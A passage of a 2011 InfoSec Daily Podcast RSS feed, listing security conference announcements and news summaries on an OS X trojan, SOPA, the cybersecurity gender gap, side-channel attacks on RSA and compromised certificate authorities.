		<itunes:duration>0:39:40</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 506 for October 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangrajan, Geordy Rostad, and Dr. Bonez. 
	Announcements:
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Wh[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 506 for October 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangrajan, Geordy Rostad, and Dr. Bonez. 
	Announcements:
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	(It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.defcon.org/html/links/dc-archives/dc-19-archive.html
	The videos for DEF CON 19 have been posted. &#160;
	Source: http://www.darkreading.com/insider-threat/167801100/security/client-security/231901810/social-malice-one-in-100-tweets-and-one-in-60-facebook-posts-are-malicious.html
	Here&#39;s what social networking looks like on the dark side: one in 100 tweets today are malicious, and one in 60 Facebook posts are as well.
	Facebook users are the least confident in social network security, with 40 percent confessing they feel unsafe on Facebook, while 28 percent feel that way about Twitter, and 14 percent on LinkedIn. But that doesn&#39;t mean LinkedIn won&#39;t eventually become a big target for cybercrime: &#34;When you look at the actual damage that could be done to a business&#34; by hackers targeting LinkedIn accounts, it&#39;s high for business disruption and employee misinformation, for example, says Daniel Peck, senior research scientist with Barracuda Labs, who today at HackerHalted in Miami shared Barracuda&#39;s latest data on malicious activity on Twitter, Facebook, and on search engines.
	According to new Barracuda survey data of social media users, LinkedIn is the least-blocked social network by enterprises, with only 20 percent of organizations preventing their employees from using LinkedIn from work. That in contrast to Twitter (25 percent); Google+ (24 percent); and Facebook (31 percent).
	Peck predicts that LinkedIn definitely will be a target for badness. &#34;I think there will be a lot of social attacks there,&#34; he says.
	Interestingly, most users say the important factors to consider when joining a social network are security (92 percent), that their friends use it (91 percent), privacy (90 percent), and ease of use (87 percent). More than 90 percent have received spam over a social network, and more than half have experienced phishing attacks. More than 20 percent have received malware, 16.6 have had their account used for spamming, and about 13 percent have had their account hijacked or their password stolen. More than half are unhappy with Face[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 505 &#8211; Tsunami, SOPA, NO Shit, SideChan &amp; CA Pwnage</title>
		<link>http://www.isdpodcast.com/episode-505-tsunami-sopa-no-shit-sidechan-ca-pwnage</link>
		<comments>http://www.isdpodcast.com/episode-505-tsunami-sopa-no-shit-sidechan-ca-pwnage#comments</comments>
		<pubDate>Thu, 27 Oct 2011 14:15:36 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3036</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 505 for October 27, 2011. &#160;Tonight&#39;s podcast is hosted by &#160;Karthik Rangarajan, Boris Sverdlik, and Varun Sharma Props to our special co-host for the day: Spridel! Announcements: New Hampshire InfoSec Tweetup When: October 29, 2011 Where: Pawtuckaway State Park in Nottingham, NH http://nhinfosectweetup.eventbrite.com/ ( It is just a gathering of security [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 505 for October 27, 2011. &nbsp;Tonight&#39;s podcast is hosted by &nbsp;Karthik Rangarajan, Boris Sverdlik, and Varun Sharma</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Props to our special co-host for the day: Spridel!</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tgdaily.com/security-features/59283-tsunami-a-os-x-trojan-spotted-in-the-wild"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tgdaily.com/security-features/59283-tsunami-a-os-x-trojan-spotted-in-the-wild</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers have identified a new backdoor trojan targeting systems running Mac OS X. &nbsp;Interestingly enough, Tsunami appears to be a port of Troj/Kaiten, a Linux Trojan that embeds itself on a computer system and monitors an IRC channel for further instructions.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Sophos Security researcher Graham Cluley notes, trojans like Tsunami/Kaiten are typically used to drag infected computers into coordinated DDoS (distributed denial-of-service) attacks, which flood a targeted website server with a massive amount of traffic.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s not just a DDoS tool though. As you can see by the portion of OSX/Tsunami&#39;s source code, the bash script can be given a variety of different instructions and can be used to remotely access an affected computer,&quot; he explained.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The big question, of course, is how would this code find itself on your Mac in the first place? It could be that a malicious hacker plants it there, to access your computer remotely and launch DDoS attacks, or it may even be that you have volunteered your Mac to participate in an organized attack on a website.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cluley also warned that he &quot;fully expected&quot; to see cyber criminals target poorly protected Mac computers in the future.   </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If the bad guys think they can make money out of infecting and compromising Macs, they will keep trying,&quot; he added. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="https://www.eff.org/deeplinks/2011/10/disastrous-ip-legislation-back-%E2%80%93-and-it%E2%80%99s-worse-ever"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/10/disastrous-ip-legislation-back-%E2%80%93-and-it%E2%80%99s-worse-ever</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve reported here often on efforts to ram through Congress legislation that would authorize massive interference with the Internet, all in the name of a fruitless quest to stamp out all infringement online. &nbsp;Today Representative Lamar Smith upped the ante, introducing legislation, called the Stop Online Piracy Act, or &quot;SOPA,&quot; that would not only sabotage the domain name system but would also threaten to effectively eliminate the DMCA safe harbors that, while imperfect, have spurred much economic growth and online creativity.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As with its Senate-side evil sister, PROTECT-IP, SOPA would require service providers to &ldquo;disappear&rdquo; certain websites, endangering Internet security and sending a troubling message to the world: it&rsquo;s okay to interfere with the Internet, even effectively blacklisting entire domains, as long as you do it in the name of IP enforcement. Of course blacklisting entire domains can mean turning off thousands of underlying websites that may have done nothing wrong. &nbsp;And in what has to be an ironic touch, the very first clause of SOPA states that it shall not be &ldquo;construed to impose a prior restraint on free speech.&rdquo; As if that little recitation could prevent the obvious constitutional problem in what the statute actually does. &nbsp;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But it gets worse. Under this bill, service providers (including hosting services) would be under new pressure to monitor and police their users&rsquo; activities. &nbsp;Websites that simply don&rsquo;t do enough to police infringement (and it is not at all clear what would qualify as &ldquo;enough&rdquo;) are now under threat, even though the DMCA expressly does not require affirmative policing. &nbsp;It creates new enforcement tools against folks who dare to help users access sites that may have been &ldquo;blacklisted,&rdquo; even without any kind of court hearing. The bill also requires that search engines, payment providers (such as credit card companies and PayPal), and advertising services join in the fun in shutting down entire websites. &nbsp;In fact, the bill seems mainly aimed at creating an end-run around the DMCA safe harbors. Instead of complying with the DMCA, a copyright owner may now be able to use these new provisions to effectively shut down a site by cutting off access to its domain name, its search engine hits, its ads, and its other financing even if the safe harbors would apply.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And that&rsquo;s only the beginning: we haven&rsquo;t even started on the streaming provisions.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&rsquo;ll have more details on the bill in the next several days but suffice it to say, this is the worst piece of IP legislation we&rsquo;ve seen in the last decade &mdash; and that&rsquo;s saying something. &nbsp;This would be a good time to contact your Congressional representative and tell them to oppose this bill!</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.stuff.co.nz/technology/digital-living/5867963/Cybersecurity-mainly-male-domain"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.stuff.co.nz/technology/digital-living/5867963/Cybersecurity-mainly-male-domain</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There were no lines for the ladies room. That was unusual for an event attended by thousands but typical in the cybersecurity field where a futuristic image clashes with an old-fashioned gender gap.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At cybersecurity and hacker gatherings, women are clearly in the minority among the sea of men lining escalators, filling gigantic hotel ballrooms and networking in hallways. (Some men grumbled about the lack of women at event parties).</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the US government and private sector urgently try to beef up cybersecurity efforts, the information technology field that supplies talent remains largely a male domain.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Experts say the lack of women is not so much a matter of discrimination as the fact that young women do not think of cyber as a career option. They attribute that partly to an unappealing &quot;geek&quot; image from movies and girls&#39; lack of early computer skills that boys develop by playing video games.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The portrayal in movies and television of a nerd loner, wearing thick glasses, soldering circuits together, and living in a dungeon-like room surrounded by computers and eating boxed pizza can be a deterrent.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phyllis Schneck, chief technology officer for public sector at McAfee Inc, said she was one of the only women in computer science as an undergraduate at Johns Hopkins University and her friends used to make geek jokes. &quot;But when it came time to help them fix their computers because it ate their term paper, I&#39;m the one they called,&quot; she said.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://syhw.posterous.com/two-amusing-side-channel-attacks"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://syhw.posterous.com/two-amusing-side-channel-attacks</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Side channel attacks usually call up timing attacks and electromagnetic (TEMPEST) attacks. But there are different, less and more exotic, forms. I recount two amusing stories that Adi Shamir told during an invited talk in early 2011 at the Computer Security course at Coll&egrave;ge de France (Paris).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1) The first story was about ultrasonic waves. Adi and one of his student bought an ultrasonic microphone, like the ones used to study bats. They recorded the sonic spectrum up to 48Khz near a computer performing RSA encryption</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2) The second story was about USB devices. Basically, they plugged a very precise voltmeter into an USB port and started recording the very small variations between 4.999V and 5V. With the same assembly-test-program-pattern-matching approach, they broke RSA again. Better yet, they cut off the USB power from the OS USB controls, and they were able to perform exactly the same side channel attack through residual power in the USB port.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://threatpost.com/en_us/blogs/eff-data-shows-five-cas-compromised-june-102711"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/eff-data-shows-five-cas-compromised-june-102711</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The EFF, through the use of its SSL Observatory, has taken a look at the data from certificate revocation lists for SSL certificates in recent months, and found that there were five separate CAs compromised in the last four months.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data that the EFF looked at was a summary of the reasons that specific certificates were revoked by CAs, as reported by the CAs themselves in CRLs. When a certificate is revoked, the CA specifies a reason for the action, and the EFF looked through the data collected in its SSL Observatory database and found that a scan of CRLs in June showed that 10 individual CAs reported that they were revoking 55 total certificates because of a CA compromise. Another scan in mid-October showed that 15 separate CAs had revoked 248 certificates because of a compromise.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Those &quot;CA Compromise&quot; CRL entries as of June were published by 10 distinct CAs. So, from this data, we can observe that at least 5 CAs have experienced or discovered compromise incidents in the past four months. Again, each of these incidents could have broken the security of any HTTPS website,&quot; Peter Eckersley of the EFF wrote in an analysis of the data.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The only widely known CA compromise since June is the attack on DigiNotar this summer that completely compromised that company&#39;s CA infrastructure and eventually led to it being shut down. All of the major browser vendors were forced to revoke their trust in the DigiNotar root certificates and the attacker who claimed credit for the attack said that he also had compromised several other CAs.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier this year, the same attacker said he was responsible for the attack on Comodo that compromised a registration authority in Europe and enabled him to issue rogue certificates for a variety of valuable sites, including Skype, Yahoo and Google. He did the same thing after compromising DigiNotar. Those two incidents spurred a broad discussion in the industry about the inherent problems with the CA system and the dangers of relying on it. No clear solution to the problem has emerged, although the Convergence system designed by Moxie Marlinspike has garnered some attention.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-505-tsunami-sopa-no-shit-sidechan-ca-pwnage/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3036/0/infosec-daily-podcast-episode-505.mp3" length="22961678" type="audio/mpeg" />
		<itunes:duration>0:47:50</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 505 for October 27, 2011. &#160;Tonight&#39;s podcast is hosted by &#160;Karthik Rangarajan, Boris Sverdlik, and Varun Sharma
	Props to our special co-host for the day: Spridel!
	Announcements:
	New Hampshire InfoSec Tw[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 505 for October 27, 2011. &#160;Tonight&#39;s podcast is hosted by &#160;Karthik Rangarajan, Boris Sverdlik, and Varun Sharma
	Props to our special co-host for the day: Spridel!
	Announcements:
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
